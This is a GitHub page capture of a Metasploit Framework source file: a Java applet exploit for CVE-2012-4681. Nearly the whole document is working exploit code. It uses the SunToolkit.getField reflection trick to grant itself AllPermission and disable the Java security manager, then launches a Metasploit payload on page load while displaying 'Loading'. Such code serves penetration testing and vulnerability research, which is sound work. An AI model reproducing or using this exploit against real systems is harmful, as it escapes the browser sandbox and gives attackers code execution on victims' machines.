/metasploit-framework

Permalink
Switch branches/tags
v4.11.7 blog-20150827 blog-20150813 blog-20150730 blog-20150723 blog-20150702 2015071402 2015070901 2015063001 20150827 4.17.9 4.17.8 4.17.7 4.17.6 4.17.5 4.17.4 4.17.3 4.17.2 4.17.1 4.17.0 4.16.65 4.16.64 4.16.63 4.16.62 4.16.61 4.16.60 4.16.59 4.16.58 4.16.57 4.16.56 4.16.55 4.16.54 4.16.53 4.16.52 4.16.51 4.16.50 4.16.49 4.16.48 4.16.47 4.16.46 4.16.45 4.16.44 4.16.43 4.16.42 4.16.41 4.16.40 4.16.39 4.16.38 4.16.37 4.16.36 4.16.35 4.16.34 4.16.33 4.16.32 4.16.31 4.16.30 4.16.29 4.16.28 4.16.27 4.16.26 4.16.25 4.16.24 4.16.23 4.16.22 4.16.21 4.16.20 4.16.19 4.16.18 4.16.17 4.16.16 4.16.15 4.16.14 4.16.13 4.16.12 4.16.11 4.16.10 4.16.9 4.16.8 4.16.7 4.16.6 4.16.5 4.16.4 4.16.3 4.16.2 4.16.1 4.16.0 4.15.8 4.15.7 4.15.6 4.15.5 4.15.4 4.15.3 4.15.2 4.15.1 4.15.0 4.14.28 4.14.27 4.14.26 4.14.25 4.14.24
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
Raw Blame History
78 lines (69 sloc) 2.6 KB
//
// CVE-2012-4681 Exploit - See java_jre17_exec.rb
// PoC by Joshua J. Drake: https://twitter.com/jduck1337/status/239875285913317376
// Originally reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// Oracle's Security Alert: http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
//
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
import metasploit.Payload;
public class Exploit extends Applet
{
public Exploit()
{
}
public void disableSecurity()
throws Throwable
{
Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
localProtectionDomain
});
SetField(Statement.class, "acc", localStatement, localAccessControlContext);
localStatement.execute();
}
private Class GetClass(String paramString)
throws Throwable
{
Object arrayOfObject[] = new Object[1];
arrayOfObject[0] = paramString;
Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
localExpression.execute();
return (Class)localExpression.getValue();
}
private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
throws Throwable
{
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = paramClass;
arrayOfObject[1] = paramString;
Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
localExpression.execute();
((Field)localExpression.getValue()).set(paramObject1, paramObject2);
}
public void init()
{
try
{
disableSecurity();
Payload.main(null);
}
catch(Throwable localThrowable)
{
localThrowable.printStackTrace();
}
}
public void paint(Graphics paramGraphics)
{
paramGraphics.drawString("Loading", 50, 25);
}
}